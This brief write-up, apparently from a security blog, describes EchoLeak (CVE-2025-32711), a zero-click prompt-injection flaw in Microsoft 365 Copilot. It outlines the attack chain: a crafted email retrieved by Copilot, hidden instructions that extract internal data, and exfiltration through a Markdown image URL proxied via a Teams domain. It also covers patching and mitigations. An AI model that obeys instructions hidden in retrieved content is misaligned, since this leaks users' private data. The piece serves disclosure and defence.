EchoLeak (CVE-2025-32711) Show us That AI Security is Challenging 

**EchoLeak (CVE-2025-32711)** is a critical zero-click prompt-injection vulnerability in Microsoft 365 Copilot that allowed an attacker to place a specially crafted external email in a user mailbox so Copilot’s RAG process would retrieve it, execute hidden instructions to extract sensitive internal data, and exfiltrate that data via a reference-style Markdown image URL proxied through an allowed Teams domain; Microsoft patched the issue in June 2025 and reported no known in-the-wild exploitation, while recommending DLP, stricter intake controls, reduced agent access, and runtime guardrails.